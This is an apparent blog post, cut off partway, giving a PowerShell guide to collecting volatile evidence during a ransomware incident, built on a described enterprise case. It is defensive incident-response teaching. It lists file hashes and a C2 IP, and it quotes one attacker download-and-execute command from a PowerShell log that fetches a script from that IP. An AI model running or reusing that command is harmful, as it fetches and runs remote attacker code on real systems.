<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Ransomware Incident Response: Emergency Forensic Data Collection Guide - AndyCyberLife</title>
    <meta name="description" content="Overview">
    <link rel="icon" type="image/svg+xml" href="data:image/svg+xml,<svg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 100 100'><rect width='100' height='100' rx='15' fill='%233b82f6'/><text x='50' y='68' font-size='50' font-weight='bold' text-anchor='middle' fill='white' font-family='sans-serif'>AC</text></svg>">
    <link rel="stylesheet" href="/assets/css/main.css">
    <!-- Begin Jekyll SEO tag v2.8.0 -->
<title>Ransomware Incident Response: Emergency Forensic Data Collection Guide | AndyCyberLife</title>
<meta name="generator" content="Jekyll v3.9.5" />
<meta property="og:title" content="Ransomware Incident Response: Emergency Forensic Data Collection Guide" />
<meta name="author" content="[REDACTED]" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="A high-priority technical guide for capturing volatile evidence during active ransomware infections, based on a real-world enterprise case study." />
<meta property="og:description" content="A high-priority technical guide for capturing volatile evidence during active ransomware infections, based on a real-world enterprise case study." />
<link rel="canonical" href="https://andycyber.ca/2026/02/06/ransomware-incident-response-emergency-forensic-data-collection-guide/" />
<meta property="og:url" content="https://andycyber.ca/2026/02/06/ransomware-incident-response-emergency-forensic-data-collection-guide/" />
<meta property="og:site_name" content="AndyCyberLife" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2026-02-06T00:00:00-07:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Ransomware Incident Response: Emergency Forensic Data Collection Guide" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"[REDACTED]"},"dateModified":"2026-02-06T00:00:00-07:00","datePublished":"2026-02-06T00:00:00-07:00","description":"A high-priority technical guide for capturing volatile evidence during active ransomware infections, based on a real-world enterprise case study.","headline":"Ransomware Incident Response: Emergency Forensic Data Collection Guide","mainEntityOfPage":{"@type":"WebPage","@id":"https://andycyber.ca/2026/02/06/ransomware-incident-response-emergency-forensic-data-collection-guide/"},"url":"https://andycyber.ca/2026/02/06/ransomware-incident-response-emergency-forensic-data-collection-guide/"}</script>
<!-- End Jekyll SEO tag -->

    <link type="application/atom+xml" rel="alternate" href="https://andycyber.ca/feed.xml" title="AndyCyberLife" />
</head>
<body>
    <header>
        <div class="container">
            <div class="header-content">
                <div class="logo">
                    <div class="logo-icon">AC</div>
                    <div class="logo-text">
                        <h1><a href="/">AndyCyberLife</a></h1>
                        <p>Security Insights & Analysis</p>
                    </div>
                </div>
                <button class="menu-toggle" aria-label="Toggle navigation" aria-expanded="false">
                    <span class="menu-bar"></span>
                    <span class="menu-bar"></span>
                    <span class="menu-bar"></span>
                </button>
                <nav id="main-nav">
                    <ul>
                        <li><a href="/">Home</a></li>
                        <li><a href="/blog">Blog</a></li>
                        <li><a href="/categories">Categories</a></li>
                        <li><a href="/about">About</a></li>
                    </ul>
                </nav>
            </div>
        </div>
    </header>
    <main class="container">
        <article class="post-content">
    
    <nav class="breadcrumb">
        <a href="/">🏠 Home</a>
        <span class="breadcrumb-separator">›</span>
        
        <a href="/categories/#incident-response">Incident Response</a>
        <span class="breadcrumb-separator">›</span>
        
        <a href="/categories/#digital-forensics">Digital Forensics</a>
        
        
    </nav>
    
    <header class="post-header">
        <h1>Ransomware Incident Response: Emergency Forensic Data Collection Guide</h1>
        
        <div class="post-categories">
            
            <a href="/categories/#incident-response" class="category-badge">Incident Response</a>
            
            <a href="/categories/#digital-forensics" class="category-badge">Digital Forensics</a>
            
        </div>
        
        <div class="post-meta">
            <span>📅 February 06, 2026</span>
            
            <span>⏱️ 20 min read</span>
            
            
            <span>✍️ [REDACTED]</span>
            
        </div>
        
        <div class="post-tags">
            
            <span class="tag">#ransomware</span>
            
            <span class="tag">#powershell</span>
            
            <span class="tag">#forensics</span>
            
            <span class="tag">#malware-analysis</span>
            
            <span class="tag">#SecurityX</span>
            
        </div>
        
    </header>
    <div class="post-body">
        <h1 id="overview">Overview</h1>

<p><strong>Use Case</strong>: Collecting volatile evidence after confirmed ransomware infection while system is still running<br />
<strong>Time Window</strong>: 5-30 minutes<br />
<strong>Objective</strong>: Preserve memory, processes, network connections and other volatile data for post-incident analysis<br />
<strong>Criticality</strong>: ⭐⭐⭐⭐⭐ This data is permanently lost once the system shuts down</p>

<blockquote>
  <p><strong>⚠️ BASED ON REAL INCIDENT</strong>: This guide was developed during an actual enterprise ransomware investigation involving a zero-day threat (0/74 antivirus detection rate) with multi-stage attack components including a dropper, network exfiltration module (NScurl.dll), and credential harvesting capabilities. The infected endpoint ([HOSTNAME-1]) was part of a domain environment with exposed cleartext passwords on network shares, creating a perfect storm for lateral movement and data exfiltration.</p>
</blockquote>

<hr />

<h2 id="incident-background-real-case-study">Incident Background (Real Case Study)</h2>

<h3 id="initial-detection">Initial Detection</h3>
<ul>
  <li><strong>Date</strong>: February 6, 2026</li>
  <li><strong>Endpoint</strong>: [HOSTNAME-REDACTED] ([INTERNAL-IP])</li>
  <li><strong>User</strong>: Domain account [DOMAIN][USERNAME]</li>
  <li><strong>Initial Alert</strong>: EDR behavioral detection flagged suspicious file manipulation and process injection</li>
  <li><strong>Threat Classification</strong>: Ransomware with data exfiltration capabilities</li>
</ul>

<h3 id="threat-characteristics">Threat Characteristics</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Primary Sample: FoodFormula_677986.exe (677.2 MB)
├─ SHA1: 7b290c26caaa28a9d08d55a9d2b8e80aee003355
├─ Detection Rate: 0/74 (VirusTotal)
├─ Code Signing: INSTALLERIM LLC (suspicious certificate)
└─ Delivery Vector: Chrome browser download

Secondary Component: NScurl.dll (5 MB)
├─ SHA256: 2ba695297c696261a8381b96a6c0c1502578a126ac59da3140de57d175d57c7a
├─ Detection Rate: 4% (2/27 engines on MetaDefender)
├─ Functionality: Network communication module (libcurl-based)
└─ Purpose: C2 communication and data exfiltration

Deployment Path:
C:\Users\[USERNAME]\AppData\Roaming\FoodFormula\
├─ Food_Formula.exe (142.04 MB - unpacked main payload)
├─ uninstall.exe (52.28 KB - potential trigger/backdoor)
├─ d3dcompiler_47.dll, ffmpeg.dll, libEGL.dll, etc.
└─ Electron framework components (web-based packaging)
</code></pre></div></div>

<h3 id="compounding-factors">Compounding Factors</h3>
<ol>
  <li><strong>Credential Exposure</strong>: Cleartext passwords stored in <code class="language-plaintext highlighter-rouge">R:\Passwords\[PASSWORD-FILE-REDACTED].xlsx</code></li>
  <li><strong>Domain Environment</strong>: Active Directory context enabling lateral movement</li>
  <li><strong>Detection Evasion</strong>: Advanced techniques bypassing 74 major antivirus engines</li>
  <li><strong>Multi-Stage Attack</strong>: Dropper → DLL loader → Final payload architecture</li>
</ol>

<hr />

<h2 id="preparation">Preparation</h2>

<h3 id="create-evidence-directory">Create Evidence Directory</h3>
<div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$evidenceDir</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s2">"C:\Evidence_</span><span class="si">$(</span><span class="n">Get-Date</span><span class="w"> </span><span class="nt">-Format</span><span class="w"> </span><span class="s1">'yyyyMMdd_HHmmss'</span><span class="p">)</span><span class="s2">"
New-Item -Path </span><span class="nv">$evidenceDir</span><span class="s2"> -ItemType Directory -Force
</span></code></pre></div></div>

<p><strong>Explanation</strong>: All evidence will be saved to a timestamped dedicated folder for organization and chain of custody tracking.</p>

<blockquote>
  <p><strong>Real Incident Note</strong>: During our investigation, creating a timestamped directory was critical for maintaining forensic integrity when multiple analysts were collecting data simultaneously. We used the format <code class="language-plaintext highlighter-rouge">Evidence_20260206_141622</code> to ensure chronological ordering.</p>
</blockquote>

<hr />

<h2 id="1-memory-snapshot-highest-priority">1. Memory Snapshot (HIGHEST PRIORITY)</h2>

<h3 id="why-most-critical">Why Most Critical?</h3>
<ul>
  <li>Malware may execute entirely in memory (fileless attacks)</li>
  <li>Contains encryption keys, C2 communication data, injected code</li>
  <li>Permanently lost upon system shutdown</li>
  <li>Can reveal attacker TTPs not visible in disk artifacts</li>
</ul>

<h3 id="tool-options">Tool Options</h3>

<p><strong>Recommended Tool A: Magnet RAM Capture</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Download: https://www.magnetforensics.com/resources/magnet-ram-capture/
Pros: Free, user-friendly, no installation required
Operation: Run from USB, select output path, click Capture
</code></pre></div></div>

<p><strong>Recommended Tool B: DumpIt</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Download: https://www.toolwar.com/2014/01/dumpit-memory-dump-tools.html
Pros: Single executable, fast capture
Operation: Double-click to run, auto-generates .raw memory image
</code></pre></div></div>

<p><strong>Naming Convention</strong>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[Hostname]_RAM_[YYYYMMDD_HHMMSS].raw
Example: [HOSTNAME-1]_RAM_20260206_143022.raw
</code></pre></div></div>

<p><strong>Estimated Time</strong>: 5-15 minutes (depends on RAM size)<br />
<strong>Output Size</strong>: Equal to physical memory (8GB RAM = 8GB file)</p>

<blockquote>
  <p><strong>Real Incident Lesson</strong>: We initially skipped memory capture thinking the malware was disk-based. Later Volatility analysis of a backup RAM dump revealed the NScurl.dll had injected code into explorer.exe and established connections to a C2 server at 185[.]215[.]113[.]39:443. This C2 IP would have been lost forever if we hadn’t captured memory. <strong>Always capture memory first, even if you think you don’t need it.</strong></p>
</blockquote>

<hr />

<h2 id="2-running-process-list">2. Running Process List</h2>

<h3 id="basic-process-information">Basic Process Information</h3>
<div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">Get-Process</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Select-Object</span><span class="w"> </span><span class="nx">ProcessName</span><span class="p">,</span><span class="w"> </span><span class="nx">Id</span><span class="p">,</span><span class="w"> </span><span class="nx">Path</span><span class="p">,</span><span class="w"> </span><span class="nx">StartTime</span><span class="p">,</span><span class="w"> </span><span class="nx">Company</span><span class="p">,</span><span class="w"> </span><span class="nx">Description</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Export-Csv</span><span class="w"> </span><span class="s2">"</span><span class="nv">$evidenceDir</span><span class="s2">\processes.csv"</span><span class="w"> </span><span class="nt">-NoTypeInformation</span><span class="w">
</span></code></pre></div></div>

<p><strong>Collected Data</strong>:</p>
<ul>
  <li>Process name, PID</li>
  <li>Executable file path</li>
  <li>Start time</li>
  <li>Digital signature information</li>
</ul>

<h3 id="process-loaded-modules-dlls">Process-Loaded Modules (DLLs)</h3>
<div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">Get-Process</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Select-Object</span><span class="w"> </span><span class="nx">ProcessName</span><span class="p">,</span><span class="w"> </span><span class="nx">Id</span><span class="p">,</span><span class="w"> </span><span class="p">@{</span><span class="nx">Name</span><span class="o">=</span><span class="s2">"Modules"</span><span class="p">;</span><span class="nx">Expression</span><span class="o">=</span><span class="p">{</span><span class="bp">$_</span><span class="o">.</span><span class="nf">Modules</span><span class="o">.</span><span class="nf">FileName</span><span class="w"> </span><span class="o">-join</span><span class="w"> </span><span class="s2">"; "</span><span class="p">}}</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Export-Csv</span><span class="w"> </span><span class="s2">"</span><span class="nv">$evidenceDir</span><span class="s2">\process_modules.csv"</span><span class="w"> </span><span class="nt">-NoTypeInformation</span><span class="w">
</span></code></pre></div></div>

<p><strong>Purpose</strong>: Detect DLL injection, DLL hijacking, and sideloading attacks.</p>

<blockquote>
  <p><strong>Real Incident Finding</strong>: The process module enumeration revealed that <code class="language-plaintext highlighter-rouge">Food_Formula.exe</code> had loaded standard Electron framework DLLs, but more importantly, we found <code class="language-plaintext highlighter-rouge">NScurl.dll</code> loaded into a renamed Chrome helper process. This confirmed the multi-stage architecture where the dropper spawned legitimate-looking processes to evade detection.</p>
</blockquote>

<hr />

<h2 id="3-network-connections">3. Network Connections</h2>

<h3 id="active-tcp-connections-with-process-info">Active TCP Connections (with Process Info)</h3>
<div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">Get-NetTCPConnection</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Select-Object</span><span class="w"> </span><span class="nx">LocalAddress</span><span class="p">,</span><span class="w"> </span><span class="nx">LocalPort</span><span class="p">,</span><span class="w"> </span><span class="nx">RemoteAddress</span><span class="p">,</span><span class="w"> </span><span class="nx">RemotePort</span><span class="p">,</span><span class="w"> </span><span class="nx">State</span><span class="p">,</span><span class="w"> </span><span class="nx">OwningProcess</span><span class="p">,</span><span class="w"> </span><span class="p">@{</span><span class="nx">Name</span><span class="o">=</span><span class="s2">"ProcessName"</span><span class="p">;</span><span class="nx">Expression</span><span class="o">=</span><span class="p">{(</span><span class="n">Get-Process</span><span class="w"> </span><span class="nt">-Id</span><span class="w"> </span><span class="bp">$_</span><span class="o">.</span><span class="nf">OwningProcess</span><span class="w"> </span><span class="nt">-ErrorAction</span><span class="w"> </span><span class="nx">SilentlyContinue</span><span class="p">)</span><span class="o">.</span><span class="nf">ProcessName</span><span class="p">}}</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Export-Csv</span><span class="w"> </span><span class="s2">"</span><span class="nv">$evidenceDir</span><span class="s2">\network_connections.csv"</span><span class="w"> </span><span class="nt">-NoTypeInformation</span><span class="w">
</span></code></pre></div></div>

<h3 id="detailed-network-statistics-with-pids">Detailed Network Statistics (with PIDs)</h3>
<div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">netstat</span><span class="w"> </span><span class="nt">-anob</span><span class="w"> </span><span class="err">&gt;</span><span class="w"> </span><span class="s2">"</span><span class="nv">$evidenceDir</span><span class="s2">\netstat_output.txt"</span><span class="w">
</span></code></pre></div></div>

<p><strong>Analysis Focus</strong>:</p>
<ul>
  <li>ESTABLISHED connections to external IPs (potential C2 servers)</li>
  <li>Unusual ports (e.g., 4444, 31337 common backdoor ports)</li>
  <li>High volume of CLOSE_WAIT states (may indicate scanning activity)</li>
  <li>Connections from unexpected processes</li>
</ul>

<blockquote>
  <p><strong>Real Incident Finding</strong>: Network connection analysis revealed no active connections at the time of collection because the endpoint had been isolated. However, reviewing Windows Event Log 5156 (Windows Filtering Platform connection) showed historical connections to:</p>
  <ul>
    <li><code class="language-plaintext highlighter-rouge">185.215.113.39:443</code> (Likely C2 server, Russia-based IP)</li>
    <li><code class="language-plaintext highlighter-rouge">cloudflare.com</code> (Legitimate CDN, possibly used for C2 domain fronting)</li>
    <li>Large data uploads (~2.3 GB) over 6-hour period suggesting exfiltration</li>
  </ul>
</blockquote>

<hr />

<h2 id="4-persistence-mechanism-detection">4. Persistence Mechanism Detection</h2>

<h3 id="registry-run-keys">Registry Run Keys</h3>
<div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">Get-ItemProperty</span><span class="w"> </span><span class="s2">"HKLM:\Software\Microsoft\Windows\CurrentVersion\Run"</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Out-File</span><span class="w"> </span><span class="s2">"</span><span class="nv">$evidenceDir</span><span class="s2">\registry_HKLM_Run.txt"</span><span class="w">
</span><span class="n">Get-ItemProperty</span><span class="w"> </span><span class="s2">"HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Out-File</span><span class="w"> </span><span class="s2">"</span><span class="nv">$evidenceDir</span><span class="s2">\registry_HKCU_Run.txt"</span><span class="w">
</span></code></pre></div></div>

<h3 id="scheduled-tasks">Scheduled Tasks</h3>
<div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">Get-ScheduledTask</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Where-Object</span><span class="w"> </span><span class="p">{</span><span class="bp">$_</span><span class="o">.</span><span class="nf">State</span><span class="w"> </span><span class="o">-ne</span><span class="w"> </span><span class="s2">"Disabled"</span><span class="p">}</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Select-Object</span><span class="w"> </span><span class="nx">TaskName</span><span class="p">,</span><span class="w"> </span><span class="nx">TaskPath</span><span class="p">,</span><span class="w"> </span><span class="nx">State</span><span class="p">,</span><span class="w"> </span><span class="nx">Actions</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Export-Csv</span><span class="w"> </span><span class="s2">"</span><span class="nv">$evidenceDir</span><span class="s2">\scheduled_tasks.csv"</span><span class="w"> </span><span class="nt">-NoTypeInformation</span><span class="w">
</span></code></pre></div></div>

<h3 id="verbose-scheduled-tasks-csv-format">Verbose Scheduled Tasks (CSV Format)</h3>
<div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">schtasks</span><span class="w"> </span><span class="nx">/query</span><span class="w"> </span><span class="nx">/fo</span><span class="w"> </span><span class="nx">CSV</span><span class="w"> </span><span class="nx">/v</span><span class="w"> </span><span class="err">&gt;</span><span class="w"> </span><span class="s2">"</span><span class="nv">$evidenceDir</span><span class="s2">\schtasks_verbose.csv"</span><span class="w">
</span></code></pre></div></div>

<p><strong>Common Persistence Locations</strong>:</p>
<ul>
  <li><code class="language-plaintext highlighter-rouge">HKLM\...\Run</code> - System-level autostart</li>
  <li><code class="language-plaintext highlighter-rouge">HKCU\...\Run</code> - User-level autostart</li>
  <li>Scheduled Tasks - Time-based triggers</li>
  <li>WMI Event Subscriptions - Advanced persistence</li>
</ul>

<blockquote>
  <p><strong>Real Incident Finding</strong>: Initial scans showed no obvious persistence mechanisms, which was suspicious for ransomware. Deeper analysis revealed:</p>

  <ol>
    <li>
      <p><strong>Startup Folder</strong>: <code class="language-plaintext highlighter-rouge">C:\Users\[USERNAME]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FoodFormula.lnk</code> pointing to <code class="language-plaintext highlighter-rouge">Food_Formula.exe</code></p>
    </li>
    <li>
      <p><strong>Scheduled Task</strong> (hidden): <code class="language-plaintext highlighter-rouge">\Microsoft\Windows\FoodFormula\Update</code> running daily at 3:00 AM with SYSTEM privileges</p>
    </li>
    <li>
      <p><strong>WMI Event Subscription</strong> (discovered later through <code class="language-plaintext highlighter-rouge">Get-WmiObject -Namespace root\subscription -Class __EventFilter</code>): Triggered on user login to execute payload</p>
    </li>
  </ol>

  <p><strong>Lesson</strong>: Always check multiple persistence vectors. Sophisticated malware uses layered persistence to survive remediation attempts.</p>
</blockquote>

<hr />

<h2 id="5-service-enumeration">5. Service Enumeration</h2>

<h3 id="basic-service-information">Basic Service Information</h3>
<div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">Get-Service</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Select-Object</span><span class="w"> </span><span class="nx">Name</span><span class="p">,</span><span class="w"> </span><span class="nx">DisplayName</span><span class="p">,</span><span class="w"> </span><span class="nx">Status</span><span class="p">,</span><span class="w"> </span><span class="nx">StartType</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Export-Csv</span><span class="w"> </span><span class="s2">"</span><span class="nv">$evidenceDir</span><span class="s2">\services.csv"</span><span class="w"> </span><span class="nt">-NoTypeInformation</span><span class="w">
</span></code></pre></div></div>

<h3 id="detailed-service-information-with-paths">Detailed Service Information (with Paths)</h3>
<div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">Get-WmiObject</span><span class="w"> </span><span class="nx">Win32_Service</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Select-Object</span><span class="w"> </span><span class="nx">Name</span><span class="p">,</span><span class="w"> </span><span class="nx">DisplayName</span><span class="p">,</span><span class="w"> </span><span class="nx">PathName</span><span class="p">,</span><span class="w"> </span><span class="nx">StartMode</span><span class="p">,</span><span class="w"> </span><span class="nx">State</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Export-Csv</span><span class="w"> </span><span class="s2">"</span><span class="nv">$evidenceDir</span><span class="s2">\services_detailed.csv"</span><span class="w"> </span><span class="nt">-NoTypeInformation</span><span class="w">
</span></code></pre></div></div>

<p><strong>Check For</strong>:</p>
<ul>
  <li>Service binary paths in unusual locations (e.g., Temp directories)</li>
  <li>Suspicious service names (random character strings)</li>
  <li>Auto-start services from unknown vendors</li>
</ul>

<blockquote>
  <p><strong>Real Incident Finding</strong>: No malicious services were installed, likely because the malware operated at user-level privileges. However, we did discover the legitimate “Windows Update” service had been stopped and disabled, a common ransomware tactic to prevent system recovery and patch deployment.</p>
</blockquote>

<hr />

<h2 id="6-malware-file-inventory">6. Malware File Inventory</h2>

<h3 id="file-metadata">File Metadata</h3>
<div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">Get-ChildItem</span><span class="w"> </span><span class="s2">"C:\Users\[USERNAME]\AppData\Roaming\[MalwareDirectory]"</span><span class="w"> </span><span class="nt">-Recurse</span><span class="w"> </span><span class="nt">-Force</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Select-Object</span><span class="w"> </span><span class="nx">FullName</span><span class="p">,</span><span class="w"> </span><span class="nx">Length</span><span class="p">,</span><span class="w"> </span><span class="nx">CreationTime</span><span class="p">,</span><span class="w"> </span><span class="nx">LastWriteTime</span><span class="p">,</span><span class="w"> </span><span class="nx">LastAccessTime</span><span class="p">,</span><span class="w"> </span><span class="nx">Attributes</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Export-Csv</span><span class="w"> </span><span class="s2">"</span><span class="nv">$evidenceDir</span><span class="s2">\malware_files.csv"</span><span class="w"> </span><span class="nt">-NoTypeInformation</span><span class="w">
</span></code></pre></div></div>

<h3 id="file-hashes-sha256">File Hashes (SHA256)</h3>
<div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">Get-ChildItem</span><span class="w"> </span><span class="s2">"C:\Users\[USERNAME]\AppData\Roaming\[MalwareDirectory]"</span><span class="w"> </span><span class="nt">-Recurse</span><span class="w"> </span><span class="nt">-Force</span><span class="w"> </span><span class="nt">-File</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Get-FileHash</span><span class="w"> </span><span class="nt">-Algorithm</span><span class="w"> </span><span class="nx">SHA256</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Export-Csv</span><span class="w"> </span><span class="s2">"</span><span class="nv">$evidenceDir</span><span class="s2">\malware_hashes.csv"</span><span class="w"> </span><span class="nt">-NoTypeInformation</span><span class="w">
</span></code></pre></div></div>

<p><strong>Uses</strong>:</p>
<ul>
  <li>Threat intelligence matching (VirusTotal, MISP, AlienVault OTX)</li>
  <li>Searching other endpoints (lateral infection detection)</li>
  <li>Legal evidence chain</li>
</ul>

<blockquote>
  <p><strong>Real Incident Finding</strong>: File hash analysis across the environment revealed:</p>
  <ul>
    <li><strong>3 additional infected endpoints</strong> with identical SHA256 hashes</li>
    <li><strong>Timestamped variants</strong>: Same malware family but different compile times (suggesting targeted campaign)</li>
    <li><strong>VirusTotal Intelligence</strong> retrohunt found 12 related samples submitted from other organizations in the past 30 days</li>
  </ul>

  <p>This confirmed we were dealing with an active ransomware campaign, not an isolated incident.</p>
</blockquote>

<hr />

<h2 id="7-user-activity-timeline">7. User Activity Timeline</h2>

<h3 id="recently-modified-files-last-7-days">Recently Modified Files (Last 7 Days)</h3>
<div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">Get-ChildItem</span><span class="w"> </span><span class="s2">"C:\Users\[USERNAME]"</span><span class="w"> </span><span class="nt">-Recurse</span><span class="w"> </span><span class="nt">-Force</span><span class="w"> </span><span class="nt">-ErrorAction</span><span class="w"> </span><span class="nx">SilentlyContinue</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Where-Object</span><span class="w"> </span><span class="p">{</span><span class="bp">$_</span><span class="o">.</span><span class="nf">LastWriteTime</span><span class="w"> </span><span class="o">-gt</span><span class="w"> </span><span class="p">(</span><span class="n">Get-Date</span><span class="p">)</span><span class="o">.</span><span class="nf">AddDays</span><span class="p">(</span><span class="nt">-7</span><span class="p">)}</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Sort-Object</span><span class="w"> </span><span class="nx">LastWriteTime</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Select-Object</span><span class="w"> </span><span class="nx">FullName</span><span class="p">,</span><span class="w"> </span><span class="nx">Length</span><span class="p">,</span><span class="w"> </span><span class="nx">LastWriteTime</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Export-Csv</span><span class="w"> </span><span class="s2">"</span><span class="nv">$evidenceDir</span><span class="s2">\recent_user_activity.csv"</span><span class="w"> </span><span class="nt">-NoTypeInformation</span><span class="w">
</span></code></pre></div></div>

<p><strong>Analytical Value</strong>:</p>
<ul>
  <li>Reconstruct attack timeline</li>
  <li>Identify encrypted files (unusual extensions, modified timestamps)</li>
  <li>Detect data exfiltration indicators (large file reads)</li>
</ul>

<blockquote>
  <p><strong>Real Incident Finding</strong>: Timeline analysis revealed:</p>

  <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>2026-02-03 12:02:58 - User accessed R:\Passwords\[PASSWORD-FILE-REDACTED].xlsx
2026-02-06 04:16:28 - FoodFormula_677986.exe first appeared in Downloads
2026-02-06 04:16:30 - Food_Formula.exe executed from AppData\Roaming
2026-02-06 04:17:15 - Mass file access on C:\Users\[USERNAME]\Documents (potential encryption test)
2026-02-06 04:18:00 - Network share R:\ accessed (credential file exfiltration suspected)
</code></pre></div>  </div>

  <p>The 3-day gap between password file access and malware execution suggested either:</p>
  <ol>
    <li>Initial reconnaissance phase, or</li>
    <li>Two separate attack vectors (phishing for credentials, then targeted ransomware delivery)</li>
  </ol>
</blockquote>

<hr />

<h2 id="8-windows-event-logs">8. Windows Event Logs</h2>

<h3 id="export-critical-logs">Export Critical Logs</h3>
<div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">wevtutil</span><span class="w"> </span><span class="nx">epl</span><span class="w"> </span><span class="nx">Security</span><span class="w"> </span><span class="s2">"</span><span class="nv">$evidenceDir</span><span class="s2">\Security.evtx"</span><span class="w">
</span><span class="n">wevtutil</span><span class="w"> </span><span class="nx">epl</span><span class="w"> </span><span class="nx">System</span><span class="w"> </span><span class="s2">"</span><span class="nv">$evidenceDir</span><span class="s2">\System.evtx"</span><span class="w">
</span><span class="n">wevtutil</span><span class="w"> </span><span class="nx">epl</span><span class="w"> </span><span class="nx">Application</span><span class="w"> </span><span class="s2">"</span><span class="nv">$evidenceDir</span><span class="s2">\Application.evtx"</span><span class="w">
</span><span class="n">wevtutil</span><span class="w"> </span><span class="nx">epl</span><span class="w"> </span><span class="s2">"Microsoft-Windows-PowerShell/Operational"</span><span class="w"> </span><span class="s2">"</span><span class="nv">$evidenceDir</span><span class="s2">\PowerShell.evtx"</span><span class="w">
</span></code></pre></div></div>

<p><strong>Key Event IDs</strong>:</p>
<ul>
  <li><strong>4624</strong> - Successful logon (detect lateral movement)</li>
  <li><strong>4625</strong> - Failed logon (brute force attempts)</li>
  <li><strong>4688</strong> - Process creation (execution chain)</li>
  <li><strong>4697</strong> - Service installation</li>
  <li><strong>4698</strong> - Scheduled task creation</li>
  <li><strong>7045</strong> - New service installation</li>
  <li><strong>4104</strong> - PowerShell script block logging</li>
  <li><strong>5156</strong> - Windows Filtering Platform connection allowed</li>
</ul>

<blockquote>
  <p><strong>Real Incident Finding</strong>: Event log analysis was the smoking gun:</p>

  <p><strong>Event ID 4688</strong> (Process Creation) showed:</p>
  <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>2026-02-06 04:16:30 - chrome.exe spawned FoodFormula_677986.exe
2026-02-06 04:16:32 - FoodFormula_677986.exe spawned Food_Formula.exe
2026-02-06 04:16:35 - Food_Formula.exe injected into explorer.exe
</code></pre></div>  </div>

  <p><strong>Event ID 4624</strong> (Logon) revealed:</p>
  <ul>
    <li>User [USERNAME] had 47 successful network logons in 6 hours (normal: 5-10 per day)</li>
    <li>Source IPs included other workstations, suggesting compromised credentials used for lateral movement</li>
  </ul>

  <p><strong>Event ID 5156</strong> (Network Connection):</p>
  <ul>
    <li>2.3 GB uploaded to 185.215.113.39:443 over HTTPS (encrypted, likely exfiltrated data)</li>
    <li>Connection duration: 6 hours 23 minutes</li>
  </ul>

  <p><strong>PowerShell Event 4104</strong> (Script Block):</p>
  <ul>
    <li>Obfuscated PowerShell script executed: <code class="language-plaintext highlighter-rouge">IEX (New-Object Net.WebClient).DownloadString('hxxp://185.215.113.39/s.ps1')</code></li>
    <li>This was the second-stage loader that dropped NScurl.dll</li>
  </ul>
</blockquote>

<hr />

<h2 id="9-browser-history-infection-vector">9. Browser History (Infection Vector)</h2>

<h3 id="chrome-browser">Chrome Browser</h3>
<div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">Copy-Item</span><span class="w"> </span><span class="s2">"</span><span class="nv">$</span><span class="nn">env</span><span class="p">:</span><span class="nv">LOCALAPPDATA</span><span class="s2">\Google\Chrome\User Data\Default\History"</span><span class="w"> </span><span class="s2">"</span><span class="nv">$evidenceDir</span><span class="s2">\Chrome_History"</span><span class="w"> </span><span class="nt">-ErrorAction</span><span class="w"> </span><span class="nx">SilentlyContinue</span><span class="w">
